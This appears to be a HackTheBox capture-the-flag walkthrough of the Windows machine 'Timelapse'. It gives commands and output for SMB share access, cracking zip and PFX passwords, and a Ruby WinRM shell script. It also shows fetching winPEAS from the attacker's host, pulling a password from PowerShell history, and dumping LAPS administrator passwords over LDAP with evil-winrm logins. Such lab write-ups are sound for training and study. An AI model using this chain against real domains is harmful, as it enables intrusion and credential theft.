# Enum SMB

`smbclient -L 10.129.119.230`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# smbclient -L 10.129.119.230     
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.119.230 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

# Access Shares directory

- `smbclient //10.129.119.230/Shares`
- `get winrm_backup.zip`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# smbclient //10.129.119.230/Shares
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 1155076 blocks available
smb: \> cd Dev\
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 1152888 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (6.7 KiloBytes/sec) (average 6.7 KiloBytes/sec)
```

# Crack zip password

`zip2john winrm_backup.zip > hash.txt`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
```

`john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2022-03-27 20:57) 1.851g/s 6432Kp/s 6432Kc/s 6432KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

# Decompress zip

`unzip winrm_backup.zip`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx
```

# Crack password pfx

`crackpkcs12 -v -t 40 -d /usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# crackpkcs12 -v -t 40 -d /usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx        

Dictionary attack - Starting 40 threads

Performance:      279330256121140 passwords [   20778 passwords per second]second]
*********************************************************
Dictionary attack - Thread 15 - Password found: thuglegacy
*********************************************************
```

# Extrack information of pfx file

- `openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.cer`
- `openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy.key`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.cer
Enter Import Password:
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
```

# Using winrm_shell.rb to get shell

```rb
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new( 
  endpoint: 'https://10.129.227.113:5986/wsman',
  transport: :ssl,
  client_cert: 'legacyy.cer',
  client_key: 'legacyy.key',
  :no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end
```

# Execute script

- `ruby winrm_shell.rb`
- `Enter PEM pass phrase: thuglegacy`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# ruby winrm_shell.rb 
Enter PEM pass phrase:
PS timelapse\legacyy@DC01 Documents> whoami
timelapse\legacyy
```

# Download winpeas

`PS timelapse\legacyy@DC01 legacyy> iwr http://10.10.14.50/winPEASx64.exe -Outfile c:\users\legacyy\Documents\winpeas.exe`

# Execute linpeas and get interesting path

`.\winpeas.exe`

```
ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 434B
```

# Get password for svc_deploy

`type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`

```
PS timelapse\legacyy@DC01 documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Enter PEM pass phrase:
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```

# Connect with evil-winrm

`evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
```

# User has LAPS_Readers

```
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.
```

# Dump LAPS password

`ldapsearch -H ldap://10.129.227.113 -D 'svc_deploy' -w 'E3R$Q62^12p7PLlC%KWaxuaV' -b "DC=timelapse,DC=htb" "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# ldapsearch -H ldap://10.129.227.113 -D 'svc_deploy' -w 'E3R$Q62^12p7PLlC%KWaxuaV' -b "DC=timelapse,DC=htb" "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd
# extended LDIF
#
# LDAPv3
# base <DC=timelapse,DC=htb> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-Mcs-AdmPwd 
#

# DC01, Domain Controllers, timelapse.htb
dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: 1PpSq+lFw$8jQ3,4!OV-1mK@

# search reference
ref: ldap://ForestDnsZones.timelapse.htb/DC=ForestDnsZones,DC=timelapse,DC=htb

# search reference
ref: ldap://DomainDnsZones.timelapse.htb/DC=DomainDnsZones,DC=timelapse,DC=htb

# search reference
ref: ldap://timelapse.htb/CN=Configuration,DC=timelapse,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
```

# Login with administrator user

`evil-winrm -i 10.129.227.113 -u Administrator -p '1PpSq+lFw$8jQ3,4!OV-1mK@' -S`

```
┌──(root㉿kali)-[~/htb/Box/Windows/Timelapse]
└─# evil-winrm -i 10.129.227.113 -u Administrator -p '1PpSq+lFw$8jQ3,4!OV-1mK@' -S

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```

# Root flag

`type c:\users\TRX\Desktop\root.txt`

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\TRX\Desktop


    Directory: C:\users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/29/2022   6:07 PM             34 root.txt
```

# References
https://github.com/allyomalley/p12Cracker \
https://github.com/crackpkcs12/crackpkcs12 \
https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb \
https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/